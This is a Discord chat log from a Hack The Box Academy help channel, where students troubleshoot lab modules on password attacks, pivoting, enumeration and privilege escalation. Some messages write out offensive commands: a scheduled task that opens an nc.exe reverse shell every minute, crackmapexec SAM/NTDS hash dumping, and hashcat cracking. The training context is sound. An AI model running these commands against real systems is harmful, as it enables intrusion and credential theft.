#modules

1 messages · Page 42 of 1

plush steppe
#

this should work no?

high sentinel
#

i dont use anything else than vim

plush steppe
#

because it doesn't

high sentinel
#

-vvv

plush steppe
#

-vvv

ripe terrace
#

You don't need sudo

high sentinel
plush steppe
#

WHY DID THAT WORK

#

😭

#

Thanks man

high sentinel
#

omg

#

you won't get anywhere with such attitude

plush steppe
#

doesn't say that anywhere in the module

#

I'll try to find out why

ripe terrace
#

What part made it work?

high sentinel
#

removing the sudo obviously

naive sky
#

hello excuse me

#

i havent seen it for payment

#

paypal

#

in HTB academy

high sentinel
naive sky
#

@surreal rain

high sentinel
#

as far as i know there are (were?) some issues with payment processing recently but i don't know any of the details

high sentinel
plush steppe
#

Oh lol I forgot to chmod ssh freaked out

#

guess they don't want me to lose my key

#

oh but it seems that I changed the permissions to low of an amount

high sentinel
novel matrix
ripe terrace
#

Has anyone completely finished the Password Attacks module that could help with this? I have been stuck here for ages.

plush steppe
high sentinel
# plush steppe oh but it seems that I changed the permissions to low of an amount

but really, work on your attitude. I'm trying to help you, i'm not trying to offend you or so. If you're just stupidly running random commands and pasting screenshots here to get help without really understanding whats happening or even trying to understand/research it on your own first, you're not getting pretty much anything from the academy.

plush steppe
#

I'm trying to learn it

#

it's just some of the errors are very confusing

high sentinel
# plush steppe ok so

that's my point - it's asking you for a password. SSH key is something totally different than a password

high sentinel
plush steppe
#

Alright

high sentinel
#

if you're expecting to get answers from somebody else, you won't really get anywhere in life at least from my experience. Ppl don't really hand out money for free in most cases

graceful rampart
#

^
There wont always be someone to give you the answers and when push comes to shove, if you always relly on getting answers from other people youll get nowhere

high sentinel
# plush steppe ok so

if you'd run that without -vvv you should get a warning about incorrect perms on the key anyway, check the output of the command again

plush steppe
#

Don't give me hints lol, I'll try figuring it out myself

teal stirrup
#

Command Injection Filter Evasion challenges fail to stay up when trying to spawn.

#

log out and login isn't working

fathom pendant
#

with that module that Doxxel is on, a LOT of the info is in the module i'd suggest looking at your notes first for that

naive sky
#

please guys

#

staff no respon , and i could chat to staff in bubble chat htb website i dont why

thorn urchin
#

bruh just wait for a response from support

novel matrix
thorn urchin
#

been told a thousand times

novel matrix
#

as f0x said, wait. Asking here will not make your ticket be any quicker.

thorn urchin
#

most companies be like "youll get a response in 2-3buisness days"

novel matrix
#

It's rather pointless asking here tbh if it is payment related

naive sky
#

in htb academy

novel matrix
#

What HTB provides is what is accepted

naive sky
#

in my country there isnt credit card just debit

#

that suffer to subscription, is there any solution?

novel matrix
#

contact customer support (billing to be more specific)

naive sky
#

email please

novel matrix
#

create a ticket and asking for billing support

naive sky
#

where to do it?

novel matrix
fathom pendant
#

hopefully there's more patience once they can access academy stuff; because hoo boy does the academy modules require some patience

naive sky
#

i didnt get hackernoob role

#

how could i get it , becasue i could send screenshot proof here

novel matrix
#

@naive sky For any further questions or issues, please create a thread via #1024429874246590575. Lets have this channel on topic please.

naive sky
#

i couldnt do

#

please i didnt get role

fathom pendant
buoyant escarp
#

Is nosqli assessment 2 javascript injection?

fathom pendant
#

idk have you tried JS injection?

pliant sage
#

has anybody done the proxy module on htb?

#

I'm at the proxying tools section but nothing seems to work like it should, has anyone encountered similare technical problems?

naive aspen
#

Can anyone point me in the right direction for the Attacking GitLab username question? The script on exploit-db didn't work for me so I wrote me own, it finds the usernames in the example so it works but what username list do I need to use? I tried all in the seclist usernames folder except the xato lists as the box timeout before it finishes the list.

stable isle
#

Hello

#

I need help

fathom pendant
naive aspen
fathom pendant
#

Your q was fine I was more responding to the person that just said "hello I need help" kinda vague

#

I haven't done the module you're on so can't help ya there

stuck hull
patent whale
#

Hi all, doing the AD module and trying to run Wireshark after xfreerdp-ing into the provided Linux box. WHen I run it without admin privileges, it, of course, does not work, but the application at least starts. When running with sudo, I get an error: "Main Warn could not connect to display :10.0". Seems like an issue with X... Could anyone help?

mellow turtle
#

Hey can someone tell me whats de neo4j default password in the pwnbox machine? I cant login with "neo4j:neo4j"

vital adder
vital adder
mellow turtle
vital adder
#

oh wait so that's the issue??

mellow turtle
#

yeah

#

xD

#

i was looking for the password

naive aspen
vital adder
#

nice

vital adder
mellow turtle
#

Its an issue bcs we dont know the password for the neo4j service. I asked the technical support for it

vital adder
#

oh wait a sec so i think they fix the authentication issue thing

#

because before if you login with any cred neo4j will give you some auth error or some thing

mild lodge
#

Hi guys, could anyone please help me out?
Stuck at AD Enumeration & Attacks - Skills Assesment part I.
I need to get to MS01 machine, have got credentials for svc_sql which is (sql)admin on SQL01. The 2 ways they show in the course to pivot to SQL01 is not working for me.
Any advice anyone? Thanks

vital adder
vital adder
mild lodge
#

No way lol 😄

copper cargo
#

leaving because ping @tidal sonnet

mild lodge
# vital adder you can just ||rdp in|| 🤣

Do I need to setup proxychains etc? Having a bit of trouble with this lab setup since can't reach certrain part of lab from kali, thinking port forwarding is kinda out of scope for this module

vital adder
#

yep. i think i use autoroute on the web target machine

rustic sage
#

hey everyone, should I use the pws.list from Resources for the mssqlsvc password recovery ATTACKING COMMON SERVICES. The hash capture's impossible as IMPERSONATE is not authd with htbdbuser?? ! SOLVED through xp_dirtree hash steal 😐 am such a noob lolll

rustic sage
#

WINDOWS PRIVILEGE ESCALATION // Pillaging : is there something wrong with the SAM, SYSTEM, SECURITY files? i have tried using secretsdump.py on different machines and there is always a problem

devout torrent
#

Hello there I am currently doing Footprinting module with IPMI category, the question that I have to answer is

What is the account's cleartext password?

Now I got the hash and i am using the command

hashcat -m 7300 -O f0c30fba82140000603501e57454b97efe0520edb6529bf9d39cbf36a58500fc440912c3689ecf1ea123456789abcdefa123456789abcdef140561646d696e:8dc9a84533290d7d8e8d587953b6a9203e0b4b50 -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u

but it says its around 1day to finish. While that might be the case sometimes, I feel that for the purpose of the lecture, i did something wrong 😛

Any help would be appreciated

placid quest
#

@devout torrent what about using john

vital adder
graceful rampart
#

I remember that section lol

#

Took me a good bit to figure that iut

rustic sage
#

oh wow that's evil yes. I also saw someone in a forum page mentionning they got the hash this way. Very confusing. Thank you for reorienting me

#

Hello, good day.

Please what's "RnD".
Saw it in the announcement.

Invest in RnD...

#

research and development

rustic sage
stuck hull
#

Why did the announcement get so many angry emoji's? It's good news no?

mild lodge
#

Hmm still stuck, port forwarding does not seem to work, feeling clueless now and throwing in the towell 😦

#

There are no writeups for the academy modules i assume?

graceful rampart
#

Which module are you on?

mild lodge
#

12:33 posted and got answer, but still not working (couple comments above here in this chat)

graceful rampart
#

I used pivoting heavily in those skills assesments

#

It makes the whole thing much much easier

#

For the bit you're up to you'll prolly wanna set up a socks proxy and then proxychains rdp

mild lodge
#

Tried through ssh but cannot reach kali ssh

graceful rampart
#

Your kali machine can access 1 machine in the target network. You need to pivot through that machine

#

(Revisit your notes from the pivoting module. It'll be helpful I promise)

mild lodge
#

Allways having trouble with poart forwarding stuff tbh

graceful rampart
#

I didn't do any port forwarding until the second skills assesment

#

I think I used chisel on the first one

#

Unless you have ssh access to the first machine. Then I would have used sshuttle

mild lodge
#

Thanks I will look into it now, hope it works 😄

graceful rampart
#

Just remember that you can't send ICMP packets jver most pivots (so you can't confirm it works by trying to ping the other machines)

rustic sage
#

Hi, I have completed all modules in NETWORK ENUMERATION WITH NMAP except one where I can not find the solution for NETWORK ENUMERATION WITH NMAP-->Service Enumeration I'm quite sure that Nma & tcpdump is to use, but tcpdump does not show the flag

#

could someone hit me in the right direction please?

patent whale
hallow swift
#

Hello! I need help with the FOOTPRINTING module, the section IMAP/POP3. I can't answer the first and the last question! please help 🙂

hallow swift
#

I ran nmap -sV -sC

stuck hull
#

read through the output carefully, that should give you no.1

hallow swift
hallow swift
#

thanks I got the first one

stuck hull
hallow swift
#

I also can't see the admin email address

worldly scaffold
#

anyone able to help with Attacking FTP of Attacking Common Services. Feel like this should be straightforward but am not getting anywhere with it. Have bruteforced with the usernames/wordlists with no results.

stuck hull
patent whale
#

Hi all, doing the AD module (Initial Enumeration Section) and trying to run Wireshark after xfreerdp-ing into the provided Linux box. WHen I run it without admin privileges, it, of course, does not work, but the application at least starts. When running with sudo, I get an error: "Main Warn could not connect to display :10.0". Seems like an issue with X... Could anyone help?

glad dock
#

Hello guys I have a bit struggle on Finding & Filtering Content (INTRODUCTION TO WINDOWS COMMAND LINE) So the 1st question and 3rd question I cannot get it (understand it) or just cannot type the correct answer....I am on it for the past 3 hours and looked everywhere for hints..... So 1st question is "

Hint: The 'Method' of which an object functions defines it.

and the 3rd one is:

Hint: We are looking recursively.

I just try all possible ways to find out I read everything few times again and again and still nothing came up 🤯
Also I checked the source code if I can get the answer but nothing 😄

Please give me some advice probably is super easy but cannot get it... Thanks

fathom pendant
graceful rampart
patent whale
#

Tried both rdesktop and xfreerdp, with the same result.

#

Indeed, tcpdump and import to WS is a workaround, but still I'd like to know why WS doesn't run with sudo and how to resolve the underlying issue.

#

CHanging password for root and logging via remote desktop directly as root helped as well.

steep mesa
#

hi guys im a newbie and rn at the tier 1 "funnel" mission,there is goal with SSH forward remote tunneling and i got sum prblm...
i created 1234 port at the server under "christine" account then started listening it from my host and connected with psql database but terminal ignores all my type inputs for list dbs like \l with big yellow words END in the terminal...
anybody can u please help me with that dolandolandolan

steep mesa
#

nahh im good HYPERLUL idk why but my interaction input way with console a little bit different from tuts but i did it mrb3n

rain acorn
#

Modul: Network Enumeration with Nmap
Section: Service Enumeration
I am trying to answer the question " Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer.". To find the flag I have tried to use tcpdump and nc. But I cannot capture any packets.
└──╼ [★]$ sudo tcpdump -i eth0 host 10.10.14.245 and 10.129.50.121 -v
tcpdump: listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
^C
0 packets captured
3 packets received by filter
0 packets dropped by kernel

If nmap alone is the key then wich option do I need? -p- -sV ? but that does not show everything ... -sA did not help either

worldly scaffold
#

again, is anyone able to offer any tips for the Attacking Email Services. Brute forcing is painfully slow for me over the VPN and I haven't got any hits from the password list with the user I've found(and I'm using the full email address for this user in hydra - i.e. user@inlanefreight.htb)

#

just restarted the box and now it works.... great.

cunning drum
#

guys i have doubts in password attack module pass the ticket in linux will any one help me if yes then dm me i need a live help

#

i will share my screen

rustic sage
#

Hi all, I'm on the pen tester route and I'm doing the SMB shares but the information that is on the lesson page is not the same information I'm getting back even though I'm using the same command

proper pagoda
#

Module: Password Attacks
Section:Credential Hunting in Linux
Guys, the objective isn't to look for credentials once you are in the host?
My dumb ass is here, brute-forcing this smb with a user cme found, but with no luck.
The HINT says ||there is user Kira with the password LoveYou1 for SSH||, but it does not work in reality. Nor any mutation of the suggested pwd. Do you have any leads i could start to go on?
Thank you!

placid quest
#

@proper pagoda mutate that password

sour osprey
#

how do i fix this?

woeful ermine
flint depot
#

Hi

summer viper
#

allo

flint depot
#

Im a guy that wants to learn how to hack, is this discord server to learn or for pros?

summer viper
#

I am not sure, myself.

flint depot
#

ok

#

just wanna know smt

#

to hack is it obligatory to use Kali Linux?

summer viper
#

no

sour osprey
#

yes this is a discord for everyone

flint depot
summer viper
#

kali linux is a collection of tools used by hackers.

flint depot
#

but its preffered?

last cape
#

hey

sour osprey
#

the pwnbox on the site is parrotOS and not Kali Linux so you dong have to use it

rustic sage
last cape
#

if anybody is good with bash scripts, can you dm me?

flint depot
#

I have windows

#

will that work?

summer viper
#

even then, parrotOS is kinda eh

rustic sage
summer viper
#

and I would just use tiny linux with docker plus cloudflare-warp

flint depot
#

linux

summer viper
#

@flint depot tRUE

#

however. Under the hood, they are the same at the assembly level. They're just doing the same calculator arithmetic how they're designed and programmed to

flint depot
#

and will my stuff get lost if i download linux?

#

from windows

summer viper
#

no. it will if you install over the entire partition

flint depot
#

coz thats how I know what will happen maybe im wrong

#

Should I just get a new pc and download linux there?

rustic sage
flint depot
#

VM?

#

Whats that

summer viper
#

or use WSL

#

or cygwin

flint depot
#

ok

#

ill check them out

summer viper
#

qemu is a good one if you're looking for thin-client plus kvm

rustic sage
flint depot
#

I already have virutal box downloaded

summer viper
#

dude, those are bloatly.....

#

use qemu or docker at that point.....

#

or mount a spreadsheet as a filesystem

flint depot
#

but I already have virtual box

summer viper
#

and it is already outdated....

flint depot
#

oh

#

anyways thx for the help guys

summer viper
#

use qemu if you need something that uses less disk space

flint depot
#

ok

summer viper
#

You're also welcome.

flint depot
#

qemu

#

thxs

#

gtg now

fathom pendant
#

This is getting off topic: #1024429874246590575 or #general is the better place for these convos; if you can't access them then you need to verify your HTB account in #bot-commands using the ++verify command

desert sleet
#

Hi team, I am stuck with this module - https://academy.hackthebox.com/module/77/section/726 - List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.

I tried many different common passwords, even using a specific list of common used passwords for SMB, but still, no lucky. Any hints?

desert sleet
broken warren
#

for the attacking common services > FTP section. IS there a way to not make medusa so slow? Im getting one request in every 5 seconds and my password list has 14344391 entries.

graceful rampart
#

Don't use Medusa 😅

woeful ermine
desert sleet
graceful rampart
#

Be a student lol

summer viper
thorn urchin
summer viper
#

Fair. Does hack-the-box have said channel?

thorn urchin
#

verify your account with #welcome to see the rest of the channels

broken warren
# graceful rampart Don't use Medusa 😅

i've been messing around with hydra now, and i keep getting [ERROR] all children were disabled due too many connection errors. EDIT i may have figured it out it was the -S flag.

summer viper
#

thank you.

formal turret
#

Hi everyone, happy new year! I’m just after some advice. I’ve been learning ethical hacking since October 2022, I’m comfortable with recon but I need to nail my exploiting. I can get so far in a box and get stuck… at this point in time do I then look at the walk through and rinse and repeat? What’s the best way of learning from your experiences on HTB?

livid pier
formal turret
livid pier
livid pier
#

im working on the windows command line module, the scheduled tasks section. I want to change the code to send a shell every minute
schtasks /create /sc MINUTE /mo 1 /tn "RevShell" /tr "C:\Users\htb-student\nc.exe 10.10.x.x 6969"
i have this code and its not working. The command will connect to the listener manually but not for the task. Anyone have any ideas?

narrow field
#

hello

#

i need help. if you want help dm me please

buoyant escarp
#

when i try NOSQLi in the assessment 2 of NOSLi module, it does not receive a username, does it look like its sanitised?

stuck hull
narrow field
#

ok

#

i cant do google account. its says that this phone number used too many times.

livid pier
#

sounds like a question for google

narrow field
vital adder
magic valve
#

Module: Active Directory Enumeration & Attacks

Section: AD Enumeration & Attacks - Skills Assessment Part II

Question: May I dm someone for a nudge for question “locate a configuration file containing an MSSQL connection string. What is the password for the user listed in the file?” to avoid spoilers?

Attempts: I’ve attempted to utilize smbclient and cme to recurse readable shares found with credentials on question 1&2 and 4&5 but can’t find/read the MSSQL connection string.

haughty sky
#

I am working on the DNS Footprinting Module (https://academy.hackthebox.com/module/112/section/1069) It seems like my target, not the pwnBox hangs after a while. I was wondering if you guys could go through the module to make sure it can be finished. It could also be that I am a noob.

vital adder
vital adder
vital adder
fathom pendant
fathom pendant
vital adder
#

he's ranked pro hacker 🤣

fathom pendant
#

Listen

#

You could probably skiddie your way to pro

vital adder
#

yep i'm definitely going to try that at least this year

thorn urchin
#

dont bully light greenies in chat 😦

#

UNRELATED but can I send both yall a DM real quick?

vital adder
#

me? sure

topaz locust
#

anyone else experiencing issues with the spawned hosts?
i refreshed 4 times already and none of them seem to answer.

buoyant escarp
#

in NOSQLi, how can i break out of this sanitazion?

feral stump
#

pls

vital adder
fathom pendant
topaz locust
#

ping works, it's supposed to be a web challenge but no webserver seems to run

#

¯_(ツ)_/¯

#

talking to the support now

fathom pendant
#

It also helps to know which module so we can check and see

#

Or hit you with that sticker ^

topaz locust
#

I'm a nab and the webserver is running on a non standard port and I just skimmed over that

#

time to sleep I guess

#

-.-

graceful rampart
graceful rampart
wraith spoke
#

can someone with a kali machine try to run pypykatz? I try it on my machine and keep getting module errors even though I checked if the module was installed

graceful rampart
#

i hate pypykatz. Its missed things on more than one occasion for me. Id rather boot up a windows vm, transfer the files to there and use the actualy mimikatz

feral stump
#

so since most of us spent here together quite some time and sometimes we really make stupid mistakes... and because this one has been the funniest one I have ever made wanted to share with you I spent like 20 mins trying to transfer a file using an ip with this format 10:10:15:170..... no more off topic from my side but really wanted to share this piece of art which I can't stop laughing at myself..... HAPPY LEARNING!

#

🙂

#

thx @vital adder !!!

feral stump
#

good one right????!!!!

#

hahaahahaha

fathom pendant
feral stump
#

you sure?

#

with :

#

in an ip?

wraith spoke
#

😄

fathom pendant
#

Yep normal to me lol

#

I can imagine someone creating a script to interpret ':' as '.' and basically swap them

feral stump
#

True

fathom pendant
#

Iirc there was a challenge box somewhere that removed spaces

sour osprey
#

Try to Analyze the deobfuscated JavaScript code, and understand its main functionality. Once you do, try to replicate what it's doing to get a secret key. What is the key? struggeling abit with this question on javascript deobfuscation

sour osprey
#

skillassesment

#

curl -s http:/SERVER_IP:PORT/ -X POST tried this command but it says command not found

vital adder
#

so your should be on question 6? hint after decode the code try to make out a ||web directory|| and a request type after that just like the question said try to replicate it

sour osprey
#

whats wrong with the command?

vital adder
#

hint it's missing something

sour osprey
#

aight thanks

#

ig i could also use burp suite

vital adder
#

or go back to the Deobfuscation section and try the given site

little mauve
#

Has any one seen the movie jolt

sour osprey
little mauve
#

There this awesome set up this chick has I wanna be that good

sour osprey
#

ill check it out tonight

little mauve
#

So where do you go to know the method of getting into the file after nmap

#

And does anyone know what to do after nmap says that it has ignores ping

feral stump
#

If your question is not related to a specific question of a section or module of HTB academy try doing modules and/or do research and you will find the answers you’re looking for

livid pier
livid pier
fathom pendant
#

Yeah lol I figured, but some days you just have those moments you know

rustic sage
#

I need help with the Skills Assessment - Easy section of the Password Attacks module. I have tried everything to get a foothold, brute forcing ssh and ftp with the users I found using the userenum msfconsole. I tried mutated passwords lists, and I just cannot seem to get anyway into the host.

long saffron
#

.

fathom pendant
#

How about ya fuck off

livid pier
#

@vital adder its so odd
its there, hasnt run but is scheduled,

plush steppe
#

yayy I finally did it

graceful rampart
#

looool

fathom pendant
plush steppe
#

btw part of the reason I asked so many questions on this is because the machine was broken

thorn urchin
#

the boxes are rarely broken

fathom pendant
#

^ usually it's the VPN connection that's broken first

#

Rather than the box

plush steppe
#

didn't need a vpn + the box was broken

raven cairn
#

I am able to add an Admin user with PrintNightmare. I ran CVE-2020-0668 with an admin user and I was able to get a shell with this user. I am still getting metepreter timeouts....

high sentinel
#

yo 🙂

#

so a command exec payload works fine? what kind of timeouts exactly - using session to the new user or while using the exploit?

#

@raven cairn

#

the added user was obviously meant to be admin so you'd root the box

raven cairn
#

one sec

high sentinel
#

two sec

#

three sec

#

off sec 😄

raven cairn
high sentinel
#

why wouldn't you just login?

#

just smb cmd exec, winrm or so

raven cairn
#

Is there an SU equivalent in windows?

high sentinel
#

i'm not sure how much familiar with these tools are you

#

yeah, runas

#

you can do runas /user:someone cmd.exe or so

raven cairn
high sentinel
#

no clue what CPTS is 😄

raven cairn
#

It's the pentesting cert for Hackthebox

high sentinel
#

oh ok, my point was if you have local admin, you can most likely run commands over smb, winrm, rdp or so

#

and pwn the box that way as runas can be problematic at times

#

so it's probably better to try something else first and keep the runas kind of like the last resort thing

#

sooo? 😄

#

👀

graceful rampart
#

😆

raven cairn
#

AAAAAAAAAAA

high sentinel
#

BBB?

raven cairn
#

Like I'm lost

#

My brain no work

high sentinel
#

smb/winrm/rdp

#

most likely something like crackmapexec -u user -p password --sam 1.2.3.4 should be fine to pwn the server

#

if that's dc then something like crackmapexec -u user -p password --ntds --drsuapi 1.2.3.4 or so

graceful rampart
#

psexec wmiexec smbexec

#

the list goes on lol

raven cairn
#

@high sentinel got it. Thank you very much

#

holy shit i am stupid 🤣

#

I am not good with instructions haha

#

Much much easier than I thought

#

literally just needed to rdp as local admin🤦‍♀️

granite prairie
#

mmmmmmmmmmmmmmmmm,

#

klo

fathom pendant
hazy grotto
gentle mortar
#

hello where is the newbie chatbox?

plush steppe
worthy jasper
#

Hey, asking here since this one is really active compared to others, but does anyone here know how to fix hashcat issues? I've manually reinstalled it according to their guide and its still giving me the shared.cl error

thorn urchin
worthy jasper
#

Gotcha, which channel would be best for that question?

thorn urchin
#

not really a tech support server so not sure. Can ask in general but good luck getting an answer. Could try positing in community help too

worthy jasper
#

I did ask in starting point, because its from that lab area, but nobody there knew how to fix it

thorn urchin
#

sometimes it be like that

fathom pendant
#

it do be like that ¯_(ツ)_/¯

rough thunder
#

Can anyone help me with SQLMap Skills assessment? I found the attack vector but I'm struggling to move forward

desert sleet
#

Linux priv escalation - "Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'."

#

I got from user1 to user2, but I'm stuck on what to do to get root access

thorn urchin
#

What have you tried

desert sleet
#

chmod bin/bash, and /root/

#

operation not permitted

#

I can see the /root directory permissions is root/user2

#

The second one is for user2 group, right?

#

Tried find /root -writable 2>/dev/null to see if there's something writable within the folder, nothing

thorn urchin
#

Need to go over some more of the initial basics. review the appropriate section from the module again.

fathom pendant
thorn urchin
#

theres a couple of "goto checks" that you havnt done.

fathom pendant
#

^

#

But as you stated you can see the root dir

desert sleet
#

Yeap, and the flag, I just don't have permissions to read it and I don't know what to do to escalate from user2 to root

fathom pendant
#

What else can you see

desert sleet
#

/root directory has group permissions set to user2. This means that any user that is a member of the user2 group can read and execute files within the /root directory, but cannot write to or modify the files in that directory.

fathom pendant
#

Yes

desert sleet
#

I thought I could be able to see the content of the files, but not modify or delete them

fathom pendant
#

Yes you can see

desert sleet
#

But flag.txt is root root

fathom pendant
#

The module talks about how to look for things

#

And what thing you might be interested in

vital adder
ivory hollow
#

Hi all

may anybody please assist me imap command which is in footprinting module. in imap/pop3 section.. i stuck in ladt two questions.

even i know where to find the last question but the commands shows error of syntax errors on fetch or examine command. Please help me.
Thanks

vital adder
desert sleet
fathom pendant
#

Bingo

thorn urchin
#

certainly something worth checking

desert sleet
#

Copied the priv key, created a id_rsa file on my own machine and used it to connect to SSH
root@gettingstartedprivesc-691403-59df5b9657-28z4k:~# whoami
root
🙂

#

tks

fathom pendant
#

<3 happy hacking

ivory hollow
#

Thanks for sharing the link @vital adder .but thats the problem those commands are not working. i dont understand why. i put the same commands but it shows syntax errors.

raw elbow
#

@ivory hollow I'm trying to guess where you might be (in the IMAP thing). Make sure to include 1<space> before each command. The character "one"

fathom pendant
#

^

#

The 1<space> is to IMAP as the semicolon ; is to sql

ivory hollow
#

like i use select DEV.DEPARTMENT.INT

#

as this command.

raw elbow
#

||1 SELECT "DEV.DEPARTEMENT.INT"||

ivory hollow
#

but further i use fetch DEV.DEPARTMENT.INT.

then it shows error

#

okay

raw elbow
#

let me check my notes real quick

ivory hollow
#

i try

#

this was not working when using 1 in front of select. it shows command not found.

fluid maple
ivory hollow
#

i dm you @raw elbow

fathom pendant
#

Iirc IMAP is case sensitive, no?

#

I know POP3 isn't

fluid maple
#

I believe so

raw elbow
#

hmmm just tried and both fetch and FETCH seem to work

#

yeah it's not case sensitive (IMAPS).

fluid maple
#

ah, right. ok. I understand the question now. but, dev.department.int doesnt exist, where DEV.DEPARTMENT.INT does.

raw elbow
#

ahhhh

#

makes sense, the values are case-sensitive but the commands aren't

#

yeah you're right.

void gate
#

**Module: **Password Attacks
**Section: **Password Mutations
**Issue Summary: **My generated wordlist for brute forcing SSH is 187k+ lines and is taking too long to process.
Attempted Solutions: cut the first 17k lines of the mut_password.list as suggested in previous discord threads.

Any suggestions to reduce the volume of passwords to use in the SSH brute force would be greatly appreciated.

fathom pendant
#

Try bruting other services first

#

Ssh is a last ditch effort to brute

last cape
#

has anybody ever had this issue when using hashcat? "Host memory required for this attack: 0 MB"

graceful rampart
last cape
graceful rampart
#

Can you show a screenshot of the error message?

last cape
#

9aa2a870d0001ea6569ec7ab579bd409

#

can you try and crack this using rockyou.txt

#

its a md5 hash

graceful rampart
#

Youre positive its md5?

last cape
#

hashcat doesn't show any errors, it just says it exhausted

#

yeah i made the hash

#

to test if it would work

graceful rampart
#

If hashcat says exhausted then the password isnt in rockyou.txt

last cape
#

it is tho :/

#

i took the password "iloveyou"

#

and hashed it

#

iloveyou is the first word in the list

#

maybe im losing it

#

and doing something terribly wrong lmao

graceful rampart
#

im 99% sure you didnt hash it properly

last cape
#

perhaps not 😦

graceful rampart
#

f25a2fc72690b780b2a14e140ef6a9e0 This is the md5 hash for iloveyou

last cape
#

check dms please

fluid maple
#

Anyone have a nudge for the last question Footprinting - mySQL ? I have found the email for the customer in the question but im getting an error. I'm showing all of the customers with their information in front of me, so I'm kind of confuesd.

fathom pendant
gilded sonnet
#

Finally finished CPTS AND CBBH Path, time to prepare for the exam!!!

fathom pendant
fluid maple
#

blarrrrg

hazy grotto
#

Im about to get off for the night. but i'm stuck on attacking common services easy lab.

I found creds... I found the two files that gave me a clue where to go next and I'm pretty sure i know the payload to send. I'm just having a hard time coming to this conlusion. Would someone with good notes DM me? I could use some help explaining this.

edgy ibex
#

I'm also stuck on this. I use the keys daily, but the module won't accept my input 😦

violet axle
#

If anyone is available to chat about the "Using CrackMapExec" Skills Assessment I'd appreciate it.

tepid thicket
#

To anyone who's taken the cpts exam, do you recommend taking some time to study and practice on active/retired machines after finishing all of the modules? My plan is to just take the exam asap while the material is still fresh in my mind

quasi wave
#

is the reason a macOS fundamentals section was added because its being planned to add more stuff related to hacking macOS?

#

I just wanted to ask

#

lol

#

that could be an entire learning path

#

or am I just not getting it?

#

I was gonna try to do everything in general but that seems a little like "ok why would I do that?" but I'm torn between that and just finishing InfoSec fundamentals and getting into job-role paths

#

thus far my goals has mainly been to complete both job-role paths by the end of this year (I started with InfoSec fundamentals this past Fall late in semester)

cunning drum
#

@quasi wave i was in depression i was unable to get a flag from 2 days i was trying to post my problem you are spamming here NotLikeThis

#

and Making fun of My Name lemonkink

quasi wave
#

sorry I didn't mean to diss

#

I meant it in jest

cunning drum
#

bro i was kidding

quasi wave
#

oh

#

damn I believed you

cunning drum
#

😆

quasi wave
#

ok lol

#

no I am literally doing the InfoSec fundamentals module

#

I'm more than 60% of way through

#

63% approximately

#

so ya

dawn wing
#

Is there a proper way to use htb in school

#

Wifi keeps kicking me off itself

rustic sage
#

sigh

dawn wing
#

School wifi

#

I cant

novel matrix
#

@dawn wing @cunning drum Please keep this channel on topic

dawn wing
#

Okay

cunning drum
#

@novel matrix sorry

devout torrent
#

Is it actually possible to do the footprint easy lab without reading the hint

ripe terrace
#

I'm having no luck brute-forcing SMB in the Attacking Common Services module, using both the provided and discovered password lists. Has anyone finished that section that could provide some insight?

rustic sage
#

HTB Academy -> Module: File Inclusion -> section : Php filter

#

I tried by Source Code Disclosure (convert-base64) , curl , nothing happen any guidance

woeful tide
#

If i wanna learn hacking apps which which should i go for

#

Like which module

hushed cosmos
#

Also im stuck on active subdomain enumeration section from information gathering - web edition module can someone help xD

rustic sage
#

What question

#

Gotta be specific!

rustic sage
woeful tide
rustic sage
#

erm

hushed cosmos
# rustic sage What question

yes, the second one about " Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer."

rustic sage
#

goody gosh

#

Send me a PM with a screenshot

woeful tide
rustic sage
#

lmaolmao nooo

#

That stuff would be probably

#

More high level

woeful tide
#

Ohhk

rustic sage
#

Start with the basic stuff

#

Uhh

#

Networking Fundamentals

nocturne copper
#

hola ?

still yacht
#

In section nmap "module/19/section/103" there is a question asking for a flag by checking on services, i got the flag but it says wrong answer? any fixes or get arounds ? Service enumeration section

proud pine
still yacht
#

nope

#

cheked twice

#

and thrice

proud pine
novel matrix
#

No. Please read the rules

brave sail
#

Hello, I'm having trouble with this question from the INFORMATION GATHERING - WEB EDITION:

#

Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer

#

nslook commands seem to not be able to reach the domain

past tundra
brave sail
#

I'm using the pwnboxes from the platform

cunning drum
#

i was stuck at password atacks Protected Files

#

Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.

#

i was trying to brute ftp and ssh am i doing correct

brave sail
brave sail
#

OKEY, AT IT

hazy grotto
#

@vital adder would you mind if I do ypu?

vital adder
#

sure

devout torrent
#

The footprint lab boxes are a beast to do ❤️

foggy kernel
#

Hello , I’d like to know how I can change the email address of my current account because of I want to put my student one instead of my personal address

versed frost
#

hey, I read in the practice section of cpts that at the end of each module, there will be number of suggested retired machines, I tried to find them but I could not, can anyone help?

ivory gazelle
#

I'm trying to post something here but the bot keeps deleting it

stable oyster
#

can someone teach me mobile hacking

wraith spoke
#

is there a wget command for windows cmd line or can i only use PS for downloads

stuck hull
#

is anyone having trouble spawning module targets?

dim hound
#

I am doing Skill Assessment 1 of Windows Privilege Escalation. I have to find: confidential.txt I have tried with tools to find this file, also with ||findstr /spin "confidential.txt"|| but I am not able to locate this file, can someone provide me a nudge?

sour osprey
#

Find a way to start a simple HTTP server inside Pwnbox or your local VM using "npm". Submit the command that starts the web server on port 8080 (use the short argument to specify the port number). struggeling alot with this oneFeelsBadMan @agile spire @solid python sorry for tagging, but need expert help

naive aspen
stuck hull
#

In the Attacking Passwords - Pash the Hash module, why would logins for other computers be stored in the memory of the MS01 computer?

I think I have misunderstood something somewhere.

#

I've found the hashes with mimikatz, I just don't understand why they'd be there.

cunning drum
#

You should Learn About Active Directory

fathom pendant
#

I found it in Google in like a few seconds

karmic helm
#

Hey ,iwant to ask something,if I don't go to college majoring in cyber security, can I work as a cyber security?

fathom pendant
#

Yeah

#

If you have the right certifications

#

College degree just means you made a time committed effort to learn

karmic helm
#

Ahhh, sowhat certificate must be prepared if i want to become a redteam(pentenster)?I see a lot on YouTube and it confuses me😭😭😭

fathom pendant
#

A certification is a document given by a registered company that is proof that you have the knowledge of a subject.

#

I.E. CompTIA A+, Network+, Security+... Or OSCP, or the htb CPTS

#

And a lot of times a certification can substitute as work experience

karmic helm
#

Ah,감사합니다(thank you)🤣😭 @fathom pendant

fathom pendant
graceful rampart
stuck hull
#

Thank you

